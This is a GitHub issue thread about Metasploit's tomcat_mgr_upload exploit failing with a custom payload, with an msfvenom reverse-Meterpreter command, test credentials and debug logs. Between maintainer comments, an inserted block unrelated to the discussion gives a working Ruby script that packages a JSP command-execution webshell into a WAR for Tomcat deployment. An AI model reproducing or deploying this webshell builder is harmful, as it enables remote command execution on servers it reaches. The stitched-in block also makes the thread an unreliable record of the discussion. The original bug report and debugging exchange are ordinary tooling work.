
multi/http/tomcat_mgr_upload doesn't support generic/custom payload

Open theguly opened this issue 2 years ago • 5 comments

I'm testing generic/custom as a payload for exploit/multi/http/tomcat_mgr_upload and it looks like it doesn't work as I expected:

msf6 exploit(multi/http/tomcat_mgr_upload) > exploit

[*] Retrieving session ID and CSRF token...
[*] Finding CSRF token...
[*] Uploading and deploying CX2BtqaO4o7RoKx4Tj3u...
[-] Exploit failed: NoMethodError undefined method `unpack' for nil:NilClass
[*] Exploit completed, but no session was created.

I have used the same method to run other exploits, for example exploit/multi/ssh/sshexec, and I had the payload run smoothly.

Steps to reproduce

  1. create a raw payload. I started with a custom zip file with my own jsp webshell, but msfvenom can be used as well: msfvenom -p java/meterpreter/reverse_http LHOST=127.0.0.1 LPORT=4545 -f raw > /root/reverse.raw
  2. verify it's a valid zip file, even unzipping it
  3. use and configure exploit:
  4. use exploit/multi/http/tomcat_mgr_upload
  5. set payload generic/custom
  6. set PAYLOADFILE /root/reverse.raw
  7. exploit

Of course the extension doesn't matter; I tried .zip and .war/.jar anyway.

Expected behavior

I'd expect that my reverse.raw is used as payload for the exploit, resulting in a new custom application deployed

Current behavior

the payload cannot be decoded/unpacked

Metasploit version

Framework: 6.2.9-dev Console : 6.2.9-dev

theguly avatar Aug 01 '22 16:08 theguly

Thanks for raising an issue :+1:

Would you mind running setg loglevel 3, running your replication steps again, then providing the value of the debug command? i.e. these Additional Information steps here: https://github.com/rapid7/metasploit-framework/blob/c447cc53fd12a488417e34ecbb6eac6777c0fad5/.github/ISSUE_TEMPLATE/bug_report.md#additional-information

What tomcat version are you targeting?

adfoster-r7 avatar Aug 01 '22 16:08 adfoster-r7

I've deployed a tomcat9 from the Kali repository and set up some weak creds on my local system. Running the exploit with a straight set payload java/meterpreter/reverse_http works; IMHO the issue is well before trying to reach the remote target.

There is also some useless info about a missing psql and errors about a payload that is listed as supported but isn't (java/jsp_shell_bind_tcp, will open another ticket later), but that's the debug output:

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/http/tomcat_mgr_upload

[multi/http/tomcat_mgr_upload]
WORKSPACE=
VERBOSE=true
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=127.0.0.1
RPORT=8080
VHOST=
SSL=false
Proxies=
UserAgent=Mozilla/5.0 (iPad; CPU OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1
HttpUsername=tomcat
HttpPassword=s3cret
HttpRawHeaders=
DigestAuthIIS=true
SSLVersion=Auto
FingerprintCheck=true
DOMAIN=WORKSTATION
HttpClientTimeout=
HttpTrace=false
HttpTraceHeadersOnly=false
HttpTraceColors=red/blu
SSLServerNameIndication=
HTTP::uri_encode_mode=hex-normal
HTTP::uri_full_url=false
HTTP::pad_method_uri_count=1
HTTP::pad_uri_version_count=1
HTTP::pad_method_uri_type=space
HTTP::pad_uri_version_type=space
HTTP::method_random_valid=false
HTTP::method_random_invalid=false
HTTP::method_random_case=false
HTTP::version_random_valid=false
HTTP::version_random_invalid=false
HTTP::uri_dir_self_reference=false
HTTP::uri_dir_fake_relative=false
HTTP::uri_use_backslashes=false
HTTP::pad_fake_headers=false
HTTP::pad_fake_headers_count=0
HTTP::pad_get_params=false
HTTP::pad_get_params_count=16
HTTP::pad_post_params=false
HTTP::pad_post_params_count=16
HTTP::shuffle_get_params=false
HTTP::shuffle_post_params=false
HTTP::uri_fake_end=false
HTTP::uri_fake_params_start=false
HTTP::header_folding=false
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
TARGETURI=/manager
PAYLOAD=generic/custom
LHOST=[CUT]
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
JavaMeterpreterDebug=false
Spawn=2
AESPassword=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
MeterpreterDebugBuild=false
MeterpreterDebugLogging=
PLATFORM=
ARCH=
PAYLOADFILE=/root/reverse.war
PAYLOADSTR=
LURI=
OverrideRequestHost=false
OverrideLHOST=
OverrideLPORT=
OverrideScheme=
HttpUserAgent=Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
HttpServerName=Apache
HttpUnknownRequestResponse=<html><body><h1>It works!</h1></body></html>
IgnoreUnknownPayloads=false
StagerURILength=
HttpHostHeader=
HttpCookie=
HttpReferer=
CreateSession=true
CommandShellCleanupCommand=
AutoVerifySession=true
SHELL=

Database Configuration

The database contains the following information:

Session Type: postgresql selected, no connection

History

The following commands were run during the session and before this issue occurred:


Framework Errors

The following framework errors occurred before the issue occurred:

[08/01/2022 12:15:20] [e(0)] core: Failed to connect to the database: connection to server at "::1", port 5432 failed: Connection refused
        Is the server running on that host and accepting TCP/IP connections?

connection to server at "127.0.0.1", port 5432 failed: Connection refused
        Is the server running on that host and accepting TCP/IP connections?

[08/01/2022 12:15:21] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/01/2022 12:15:21] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/01/2022 12:15:21] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/01/2022 12:15:26] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
[08/01/2022 12:16:59] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
[08/01/2022 12:17:10] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
[08/01/2022 12:17:13] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
[08/01/2022 12:31:50] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1514:in `to_jsp'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1530:in `to_jsp_war'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:465:in `encoded_war'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:299:in `war_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:351:in `upload_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:152:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[08/01/2022 12:32:43] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1514:in `to_jsp'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1530:in `to_jsp_war'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:465:in `encoded_war'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:299:in `war_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:351:in `upload_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:152:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell/reverse_tcp with multi/http/tomcat_mgr_upload]: noconn to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell/reverse_tcp with multi/http/tomcat_mgr_upload]: none to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell/reverse_tcp with multi/http/tomcat_mgr_upload]: tunnel to reverse
[08/01/2022 12:32:30] [d(1)] core: Module java/shell/reverse_tcp is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: reverse to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: bind to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: noconn to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: none to reverse
[08/01/2022 12:32:30] [d(3)] core: Checking compat [java/shell_reverse_tcp with multi/http/tomcat_mgr_upload]: tunnel to reverse
[08/01/2022 12:32:30] [d(1)] core: Module java/shell_reverse_tcp is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: reverse to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: bind to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: noconn to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: none to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_http with multi/http/tomcat_mgr_upload]: tunnel to tunnel
[08/01/2022 12:32:30] [d(1)] core: Module multi/meterpreter/reverse_http is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: reverse to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: bind to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: noconn to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: none to tunnel
[08/01/2022 12:32:30] [d(3)] core: Checking compat [multi/meterpreter/reverse_https with multi/http/tomcat_mgr_upload]: tunnel to tunnel
[08/01/2022 12:32:30] [d(1)] core: Module multi/meterpreter/reverse_https is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: reverse to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: bind to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: noconn to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: none to none
[08/01/2022 12:32:33] [d(3)] core: Checking compat [generic/custom with multi/http/tomcat_mgr_upload]: tunnel to none
[08/01/2022 12:32:33] [d(1)] core: Module generic/custom is compatible with multi/http/tomcat_mgr_upload
[08/01/2022 12:32:43] [e(0)] core: Exploit failed (multi/http/tomcat_mgr_upload): NoMethodError undefined method `unpack' for nil:NilClass - NoMethodError undefined method `unpack' for nil:NilClass
Call stack:
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1514:in `to_jsp'
/usr/share/metasploit-framework/lib/msf/util/exe.rb:1530:in `to_jsp_war'
/usr/share/metasploit-framework/lib/msf/core/encoded_payload.rb:465:in `encoded_war'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:299:in `war_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:351:in `upload_payload'
/usr/share/metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb:152:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.2.9-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.3 3 May 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify

theguly avatar Aug 01 '22 16:08 theguly

From what I understand, the generic/custom payload is meant to take custom executable files (i.e. exe/elf/macho) as tomcat_mgr_upload will always wrap the payload as an encoded_war. In this scenario you're not providing an exe file - so it's dying with a very unclear exception. I think we could add extra validation here to handle the scenario of the file not being an exe/elf/etc.

What's the rationale between generating your own Meterpreter payload separately and using generic/custom, versus just using set payload java/meterpreter/reverse_http directly?

adfoster-r7 avatar Aug 01 '22 21:08 adfoster-r7
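The comment above describes the mechanism behind the failure: generic/custom hands raw bytes to the module, and tomcat_mgr_upload always pushes them through encoded_war -> to_jsp_war -> to_jsp, which only makes sense for a native executable, so a nil or non-executable payload surfaces as an opaque `unpack' error. The following Ruby is an added example written for this page, not code from metasploit-framework, showing the two pieces a practitioner would want: a magic-number check that rejects nil/empty input and distinguishes PE/ELF/Mach-O (what to_jsp can wrap) from a zip (what a WAR is), and a minimal stored-entry WAR builder plus central-directory reader for the "deploy my own JSP" case the reporter had in mind. The names classify_payload, upload_strategy, build_webshell_war, the strategy symbols and the embedded JSP are all hypothetical; the JSP is a constructed one-file command shell, and the archive carries no WEB-INF/web.xml because Tomcat 7 and later do not require one.

```ruby
require 'zlib'

# Added example, not Metasploit code. Models (1) the file-type validation
# suggested above and (2) a hand-built WAR carrying a custom JSP.

# Magic prefixes for the formats to_jsp can wrap, plus zip (a WAR is a zip).
PAYLOAD_MAGIC = {
  "MZ".b               => :pe,
  "\x7fELF".b          => :elf,
  "\xfe\xed\xfa\xce".b => :macho,   # 32-bit, big-endian byte order
  "\xfe\xed\xfa\xcf".b => :macho,   # 64-bit, big-endian byte order
  "\xce\xfa\xed\xfe".b => :macho,   # 32-bit, little-endian byte order
  "\xcf\xfa\xed\xfe".b => :macho,   # 64-bit, little-endian byte order
  "PK\x03\x04".b       => :zip
}.freeze

# Classify payload bytes by magic number. nil/empty input is what reaches
# to_jsp in the thread's trace; fail early with a message that says what
# was expected instead of "undefined method `unpack' for nil".
def classify_payload(bytes)
  if bytes.nil? || bytes.empty?
    raise ArgumentError, "payload is nil or empty: set PAYLOADFILE or PAYLOADSTR"
  end
  PAYLOAD_MAGIC.each { |magic, kind| return kind if bytes.b.start_with?(magic) }
  :unknown
end

# Build a zip archive with stored (uncompressed) entries: local headers,
# central directory, end-of-central-directory record. A WAR is exactly this.
def zip_stored(entries)
  local   = String.new(encoding: Encoding::BINARY)
  central = String.new(encoding: Encoding::BINARY)
  entries.each do |name, data|
    name   = name.b
    data   = data.b
    crc    = Zlib.crc32(data)
    offset = local.bytesize
    local   << [0x04034b50, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
                name.bytesize, 0].pack("VvvvvvVVVvv") << name << data
    central << [0x02014b50, 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
                name.bytesize, 0, 0, 0, 0, 0, offset].pack("VvvvvvvVVVvvvvvVV") << name
  end
  eocd = [0x06054b50, 0, 0, entries.size, entries.size,
          central.bytesize, local.bytesize, 0].pack("VvvvvVVv")
  local + central + eocd
end

# Read entry names back from the central directory, so a candidate WAR can
# be inspected before upload instead of being blindly handed to to_jsp_war.
def zip_entries(bytes)
  bytes = bytes.b
  eocd  = bytes.rindex("PK\x05\x06".b) or raise ArgumentError, "no end-of-central-directory record"
  count, _cd_size, cd_off = bytes[eocd + 10, 10].unpack("vVV")
  names = []
  pos = cd_off
  count.times do
    raise ArgumentError, "bad central directory header" unless bytes[pos, 4] == "PK\x01\x02".b
    name_len, extra_len, comment_len = bytes[pos + 28, 6].unpack("vvv")
    names << bytes[pos + 46, name_len]
    pos += 46 + name_len + extra_len + comment_len
  end
  names
end

# Constructed sample: a one-file JSP command shell (hypothetical, for the
# example only). Tomcat 7+ does not require WEB-INF/web.xml, so the WAR
# holds nothing but this file.
JSP_SHELL = <<~'JSP'
  <%@ page import="java.util.Scanner" %>
  <% String c = request.getParameter("c");
     if (c != null) {
       Scanner s = new Scanner(Runtime.getRuntime().exec(c).getInputStream()).useDelimiter("\\A");
       out.print(s.hasNext() ? s.next() : "");
     } %>
JSP

def build_webshell_war(jsp_name = "cmd.jsp", jsp = JSP_SHELL)
  zip_stored({ jsp_name => jsp })
end

# The decision the module could make instead of always calling to_jsp_war:
# wrap native bytes, pass a JSP-bearing WAR through, reject everything else.
def upload_strategy(bytes)
  case classify_payload(bytes)
  when :pe, :elf, :macho then :wrap_in_jsp_war
  when :zip
    zip_entries(bytes).any? { |n| n.end_with?(".jsp") } ? :deploy_war_as_is : :zip_without_jsp
  else :reject_unknown_format
  end
end

if __FILE__ == $PROGRAM_NAME
  File.binwrite("reverse.war", build_webshell_war)
  puts "wrote reverse.war: #{upload_strategy(File.binread('reverse.war'))}"
end
```

Running the file writes reverse.war next to it; unzip -l will list cmd.jsp, and the same bytes classified by classify_payload come back as :zip rather than something to_jsp would try to base64-wrap. The check costs one prefix comparison per supported format and turns a NoMethodError deep in lib/msf/util/exe.rb into an error at the datastore boundary that names the option to fix.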

From what I understand, the generic/custom payload is meant to take custom executable files (i.e. exe/elf/macho) as tomcat_mgr_upload will always wrap the payload as an encoded_war. In this scenario you're not providing an exe file - so it's dying with a very unclear exception. I think we could add extra validation here to handle the scenario of the file not being an exe/elf/etc.

Apart from a clearer error message regarding the file format, you mean that it's not possible to use generic/custom with any exploit that doesn't run elf/exe/macho because of how the payload works, isn't it?

What's the rationale between generating your own Meterpreter payload separately and using generic/custom, versus just using set payload java/meterpreter/reverse_http directly?

Probably I'm just unlucky because I was testing generic/custom and I looked for an exploit with a target easy to set up. I guess I chose the wrong exploit candidate :D

Thinking about it, it happened to me a long time ago that a tomcat server with weak creds for the manager wasn't allowed to open new connections, so any reverse shell was out of the way. Bind shells were out of the way too, and for that vulnerability this ruled out metasploit entirely, even for the pure exploitation.

theguly avatar Aug 02 '22 06:08 theguly

@adfoster-r7 do you think there is another way to have uploaded a custom webshell using such exploit? I mean, having a less picky generic/custom payload

theguly avatar Aug 09 '22 14:08 theguly

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Sep 08 '22 15:09 github-actions[bot]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Oct 10 '22 15:10 github-actions[bot]